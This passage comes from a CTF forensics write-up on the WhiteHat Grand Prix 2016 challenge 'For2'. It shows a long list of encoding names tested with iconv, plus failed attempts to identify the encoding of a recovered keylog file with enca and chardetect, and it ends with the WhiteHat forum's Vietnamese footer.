    ISO_8859-2:1987 ok: ISO_8859-2:1987
    ISO88594 ok: ISO88594
    ISO_8859-4 ok: ISO_8859-4
    ISO-8859-4 ok: ISO-8859-4
    ISO8859-4 ok: ISO8859-4
    ISO_8859-4:1988 ok: ISO_8859-4:1988
    ISO88595 ok: ISO88595
    ISO_8859-5 ok: ISO_8859-5
    ISO-8859-5 ok: ISO-8859-5
    ISO8859-5 ok: ISO8859-5
    ISO_8859-5:1988 ok: ISO_8859-5:1988
    ISO88599 ok: ISO88599
    ISO_8859-9 ok: ISO_8859-9
    ISO-8859-9 ok: ISO-8859-9
    ISO8859-9 ok: ISO8859-9
    ISO_8859-9:1989 ok: ISO_8859-9:1989
    ISO88599E ok: ISO88599E
    ISO_8859-9E ok: ISO_8859-9E
    ISO-8859-9E ok: ISO-8859-9E
    ISO8859-9E ok: ISO8859-9E
    ISO-CELTIC ok: ISO-CELTIC
    ISO-IR-100 ok: ISO-IR-100
    ISO-IR-101 ok: ISO-IR-101
    ISO-IR-110 ok: ISO-IR-110
    ISO-IR-111 ok: ISO-IR-111
    ISO-IR-139 ok: ISO-IR-139
    ISO-IR-143 ok: ISO-IR-143
    ISO-IR-144 ok: ISO-IR-144
    ISO-IR-148 ok: ISO-IR-148
    ISO-IR-156 ok: ISO-IR-156
    ISO-IR-157 ok: ISO-IR-157
    ISO-IR-179 ok: ISO-IR-179
    ISO-IR-199 ok: ISO-IR-199
    ISO-IR-203 ok: ISO-IR-203
    ISO-IR-226 ok: ISO-IR-226
    ISO/TR_11548-1/ ok: ISO/TR_11548-1/
    KOI8R ok: KOI8R
    KOI8-R ok: KOI8-R
    KOI8-RU ok: KOI8-RU
    KOI8U ok: KOI8U
    KOI8-U ok: KOI8-U
    L1 ok: L1
    L10 ok: L10
    L2 ok: L2
    L4 ok: L4
    L5 ok: L5
    L6 ok: L6
    L7 ok: L7
    L8 ok: L8
    LATIN1 ok: LATIN1
    LATIN10 ok: LATIN10
    LATIN2 ok: LATIN2
    LATIN4 ok: LATIN4
    LATIN5 ok: LATIN5
    LATIN6 ok: LATIN6
    LATIN7 ok: LATIN7
    LATIN8 ok: LATIN8
    LATIN9 ok: LATIN9
    LATIN-9 ok: LATIN-9
    MAC ok: MAC
    MAC-CENTRALEUROPE ok: MAC-CENTRALEUROPE
    MACCYRILLIC ok: MACCYRILLIC
    MAC-CYRILLIC ok: MAC-CYRILLIC
    MACINTOSH ok: MACINTOSH
    MACIS ok: MACIS
    MAC-IS ok: MAC-IS
    MAC-SAMI ok: MAC-SAMI
    MACUK ok: MACUK
    MAC-UK ok: MAC-UK
    MACUKRAINIAN ok: MACUKRAINIAN
    MIK ok: MIK
    MS-ARAB ok: MS-ARAB
    MS-CYRL ok: MS-CYRL
    MSMACCYRILLIC ok: MSMACCYRILLIC
    MS-MAC-CYRILLIC ok: MS-MAC-CYRILLIC
    OSF00010001 ok: OSF00010001
    OSF00010002 ok: OSF00010002
    OSF00010004 ok: OSF00010004
    OSF00010005 ok: OSF00010005
    OSF00010009 ok: OSF00010009
    OSF0001000A ok: OSF0001000A
    OSF00010100 ok: OSF00010100
    OSF00010101 ok: OSF00010101
    OSF00010102 ok: OSF00010102
    OSF10020025 ok: OSF10020025
    OSF10020111 ok: OSF10020111
    OSF10020115 ok: OSF10020115
    OSF10020116 ok: OSF10020116
    OSF10020118 ok: OSF10020118
    OSF1002011C ok: OSF1002011C
    OSF1002011D ok: OSF1002011D
    OSF10020129 ok: OSF10020129
    OSF100201B5 ok: OSF100201B5
    OSF100201F4 ok: OSF100201F4
    OSF10020352 ok: OSF10020352
    OSF10020354 ok: OSF10020354
    OSF10020357 ok: OSF10020357
    OSF1002035D ok: OSF1002035D
    OSF1002035E ok: OSF1002035E
    OSF1002035F ok: OSF1002035F
    OSF10020366 ok: OSF10020366
    OSF10020367 ok: OSF10020367
    OSF10020370 ok: OSF10020370
    OSF10020402 ok: OSF10020402
    OSF10020417 ok: OSF10020417
    PT154 ok: PT154
    RK1048 ok: RK1048
    RUSCII ok: RUSCII
    STRK1048-2002 ok: STRK1048-2002
    TCVN ok: TCVN
    TCVN-5712 ok: TCVN-5712
    TCVN5712-1 ok: TCVN5712-1
    TCVN5712-1:1993 ok: TCVN5712-1:1993
    TS-5881 ok: TS-5881
    UCS2 ok: UCS2
    UCS-2 ok: UCS-2
    UCS-2BE ok: UCS-2BE
    UCS-2LE ok: UCS-2LE
    UNICODE ok: UNICODE
    UNICODEBIG ok: UNICODEBIG
    UNICODELITTLE ok: UNICODELITTLE
    UTF16 ok: UTF16
    UTF-16 ok: UTF-16
    UTF16BE ok: UTF16BE
    UTF-16BE ok: UTF-16BE
    UTF16LE ok: UTF16LE
    UTF-16LE ok: UTF-16LE
    VISCII ok: VISCII
    WINDOWS-1251 ok: WINDOWS-1251
    WINDOWS-1256 ok: WINDOWS-1256
    • Tried UTF-16, UNICODELITTLE, UNICODE, LATIN1, ISO-8859-1 WINDOWS-1251, CP1251 with iconv.
    • Tried enca recognition:




      1
      2
      3
      4
      5
      6

      [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
      $ enca -f keylog.log_file.None.0x80eb7008.dat
      enca: Cannot determine (or understand) your language preferences.
      Please use `-L language', or `-L none' if your language is not supported
      (only a few multibyte encodings can be recognized then).
      Run `enca --list languages' to get a list of supported languages.
    • Tried chardet (not even a relevent output):





    1
    2
    3

    [[email protected]]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
    $ chardetect keylog.log_file.None.0x80eb7008.dat
    keylog.log_file.None.0x80eb7008.dat: windows-1253 with confidence 0.3253156807138245
    [h=2]Submit[/h]
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan